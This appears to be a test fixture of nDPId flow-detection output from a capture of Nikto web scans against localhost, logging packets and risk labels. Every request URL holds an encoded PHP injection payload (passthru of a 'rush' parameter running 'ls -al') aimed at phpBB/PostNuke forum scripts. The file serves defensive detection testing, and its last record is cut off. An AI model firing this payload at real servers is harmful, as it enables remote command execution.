00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":685,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":685,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277800,"flow_last_seen":1576420277800,"flow_idle_time":7580000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277800,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50932,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":685,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":685,"flow_packet_id":1,"flow_last_seen":1576420277800,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":381,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":381,"pkt_l4_len":347,"thread_ts_msec":1576420277800,"pkt":"AAAAAAAAAAAAAAAACABFAAFvelxAAEAGwSp\/AAABfwAAAcb0H5AcBENxXyULZYAYAED\/YwAAAQEICp1m\/1CdZv9QR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTcpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01230{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":685,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":685,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277800,"flow_last_seen":1576420277800,"flow_idle_time":7580000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277800,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50932,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":686,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":686,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277802,"flow_last_seen":1576420277802,"flow_idle_time":7580000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"midstream":1,"thread_ts_msec":1576420277802,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50934,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00907{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":686,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":686,"flow_packet_id":1,"flow_last_seen":1576420277802,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"thread_ts_msec":1576420277802,"pkt":"AAAAAAAAAAAAAAAACABFAAF0IClAAEAGG1l\/AAABfwAAAcb2H5CLkRkOnTgF7oAYAED\/aAAAAQEICp1m\/1GdZv9RR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9uYW1lPUZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNmMlNzMlMjAlMmQlNjElNmMmaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk3KQ0KDQo="}
01236{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":686,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":686,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277802,"flow_last_seen":1576420277802,"flow_idle_time":7580000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"midstream":1,"thread_ts_msec":1576420277802,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50934,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":687,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":687,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277803,"flow_last_seen":1576420277803,"flow_idle_time":7580000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"midstream":1,"thread_ts_msec":1576420277803,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50936,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00899{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":687,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":687,"flow_packet_id":1,"flow_last_seen":1576420277803,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":380,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":380,"pkt_l4_len":346,"thread_ts_msec":1576420277803,"pkt":"AAAAAAAAAAAAAAAACABFAAFudhVAAEAGxXJ\/AAABfwAAAcb4H5C7R086db2J2oAYAED\/YgAAAQEICp1m\/1OdZv9TR0VUIC9tb2R1bGVzL2luZGV4LnBocD9uYW1lPUZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNmMlNzMlMjAlMmQlNjElNmMmaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5NykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01229{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":687,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":687,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277803,"flow_last_seen":1576420277803,"flow_idle_time":7580000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"midstream":1,"thread_ts_msec":1576420277803,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50936,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":688,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":688,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277804,"flow_last_seen":1576420277804,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277804,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50938,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":688,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":688,"flow_packet_id":1,"flow_last_seen":1576420277804,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":1576420277804,"pkt":"AAAAAAAAAAAAAAAACABFAAFsoC9AAEAGm1p\/AAABfwAAAcb6H5AztpkH42OkkoAYAED\/YAAAAQEICp1m\/1SdZv9UR0VUIC9waHBCQi9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5NykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
01227{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":688,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":688,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277804,"flow_last_seen":1576420277804,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277804,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50938,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":689,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":689,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277807,"flow_last_seen":1576420277807,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277807,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50940,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":689,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":689,"flow_packet_id":1,"flow_last_seen":1576420277807,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":1576420277807,"pkt":"AAAAAAAAAAAAAAAACABFAAFsAqdAAEAGOON\/AAABfwAAAcb8H5ASjTuPR79V4YAYAED\/YAAAAQEICp1m\/1edZv9XR0VUIC9mb3J1bS9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01227{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":689,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":689,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277807,"flow_last_seen":1576420277807,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277807,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50940,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":690,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":690,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277808,"flow_last_seen":1576420277808,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277808,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50942,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00893{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":690,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":690,"flow_packet_id":1,"flow_last_seen":1576420277808,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277808,"pkt":"AAAAAAAAAAAAAAAACABFAAFnxERAAEAGd0p\/AAABfwAAAcb+H5AIB\/1vYBeRA4AYAED\/WwAAAQEICp1m\/1idZv9YR0VUIC9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk3KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01221{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":690,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":690,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277808,"flow_last_seen":1576420277808,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277808,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50942,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":691,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":691,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277810,"flow_last_seen":1576420277810,"flow_idle_time":7580000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"midstream":1,"thread_ts_msec":1576420277810,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50944,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00905{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":691,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":691,"flow_packet_id":1,"flow_last_seen":1576420277810,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":382,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":382,"pkt_l4_len":348,"thread_ts_msec":1576420277810,"pkt":"AAAAAAAAAAAAAAAACABFAAFwFdRAAEAGJbJ\/AAABfwAAAccAH5A7eCz\/38X+m4AYAED\/ZAAAAQEICp1m\/1mdZv9ZR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk3KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01231{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":691,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":691,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277810,"flow_last_seen":1576420277810,"flow_idle_time":7580000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"midstream":1,"thread_ts_msec":1576420277810,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50944,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":692,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":692,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277811,"flow_last_seen":1576420277811,"flow_idle_time":7580000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"midstream":1,"thread_ts_msec":1576420277811,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50946,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00908{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":692,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":692,"flow_packet_id":1,"flow_last_seen":1576420277811,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":387,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":387,"pkt_l4_len":353,"thread_ts_msec":1576420277811,"pkt":"AAAAAAAAAAAAAAAACABFAAF1vbdAAEAGfcl\/AAABfwAAAccCH5DikYSaCicX\/4AYAED\/aQAAAQEICp1m\/1udZv9bR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9OaWt0bz1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTcpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01237{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":692,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":692,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277811,"flow_last_seen":1576420277811,"flow_idle_time":7580000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"midstream":1,"thread_ts_msec":1576420277811,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50946,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":693,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":693,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277812,"flow_last_seen":1576420277812,"flow_idle_time":7580000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277812,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50948,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00899{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":693,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":693,"flow_packet_id":1,"flow_last_seen":1576420277812,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":381,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":381,"pkt_l4_len":347,"thread_ts_msec":1576420277812,"pkt":"AAAAAAAAAAAAAAAACABFAAFvwN5AAEAGeqh\/AAABfwAAAccEH5A7SvnykFHzA4AYAED\/YwAAAQEICp1m\/1ydZv9cR0VUIC9tb2R1bGVzL2luZGV4LnBocD9OaWt0bz1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5NykNCg0K"}
01230{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":693,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":693,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277812,"flow_last_seen":1576420277812,"flow_idle_time":7580000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277812,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50948,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 